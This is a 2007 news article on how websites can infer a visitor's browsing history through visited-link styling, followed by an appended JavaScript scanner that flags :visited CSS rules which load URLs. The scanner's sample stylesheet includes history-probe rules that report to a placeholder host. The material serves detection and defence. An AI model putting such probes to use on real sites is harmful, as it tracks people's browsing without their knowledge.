In association with heise online

02 March 2007, 14:10

Attackers able to read out list of visited web pages

"I know which web sites you visited last summer." Whilst it is not possible to determine the exact time of a visit, a web site may use a browser's history to find out whether a certain site has been visited in the past. This could, for instance, help phishers to determine the bank of a potential victim or allow internet vendors to find out which competitors' sites a user has visited.

The problem has to do with the way browsers store information on the usage of links. Visited links are displayed in a different colour than links that have not been activated. Such changes in colour are based on stylesheet settings for the respective HTML document and are stored by the browser as attributes in the history. Some months ago, security specialist Jeremiah Grossman published a sample program which can be used to exploit this behaviour.

Grossman wrote a JavaScript program with quite a long list of potential web sites; for each site on the list, it tests the colour that the stylesheet assigns to the link, which reveals which sites have been visited. While this does not mean that the history is actually read out, a list of sufficient length makes it possible to test key sites.

At present, the program only works with Mozilla derivatives (Firefox, Netscape etc.) and Safari. An online demo to test one's own history is available on The only way to avoid this special kind of attack is to disable JavaScript.

However, there is also a way to sniff out the browser history without JavaScript; the first people to present this method were researchers from the University of Indiana. An attacker may use stylesheet properties to load different background images, depending on whether the site was visited in the past or not. Manipulated HTML pages allow attackers to track the history without any script, just by monitoring whether the page loads the images. Since yesterday, a demo has been available on, implemented by RSnake; it works with Firefox and also Internet Explorer 7 and Opera 9.10. The SafeHistory plug-in from Stanford University provides protection against such visited-link-based tracking techniques.
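A site that accepts third-party stylesheets can check for the script-free variant described above. The following is an added example, not code from the article or from any tool it names: it scans CSS text for `:visited` rules whose declarations fetch a URL. The function name, the sample stylesheet and the host `tracker.example` are constructed for illustration, and the scanner handles flat rules only (no nested `@media` blocks).

```javascript
// Added example: flag stylesheet rules that make a request depend on link history.
// Simplified scanner, not a full CSS parser: flat rules only.

// Constructed sample stylesheet; tracker.example is a placeholder host.
const SAMPLE_CSS = `
/* ordinary styling: colour only, no request */
a:visited { color: purple; }
a:link { color: blue; }
/* history-dependent image loads */
a#bank1:visited { background-image: url("https://tracker.example/hit?site=bank1"); }
a#shop2:visited, a#shop3:visited span { background: URL(/hit?site=shop) no-repeat; }
.logo { background: url(/img/logo.png); }
`;

function findVisitedProbes(cssText) {
  // Drop comments so a brace or "url(" inside one cannot confuse the scan.
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const findings = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // selector list, declaration block
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const selectors = m[1].split(",").map(s => s.trim()).filter(Boolean);
    const visited = selectors.filter(s => /:visited\b/i.test(s));
    if (visited.length === 0) continue;
    // Collect every url(...) in the block, quoted or unquoted, any letter case.
    const urls = [];
    const urlRe = /url\(\s*(["']?)(.*?)\1\s*\)/gi;
    let u;
    while ((u = urlRe.exec(m[2])) !== null) urls.push(u[2]);
    // A :visited rule that only changes colour is normal; one that fetches is not.
    if (urls.length > 0) findings.push({ selectors: visited, urls });
  }
  return findings;
}

for (const f of findVisitedProbes(SAMPLE_CSS)) {
  console.log(`history-dependent request: ${f.selectors.join(", ")} -> ${f.urls.join(", ")}`);
}
```

Rules flagged this way can be stripped or rejected before the stylesheet is served; the colour-only `a:visited` rule and the unconditional `.logo` image are left alone.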
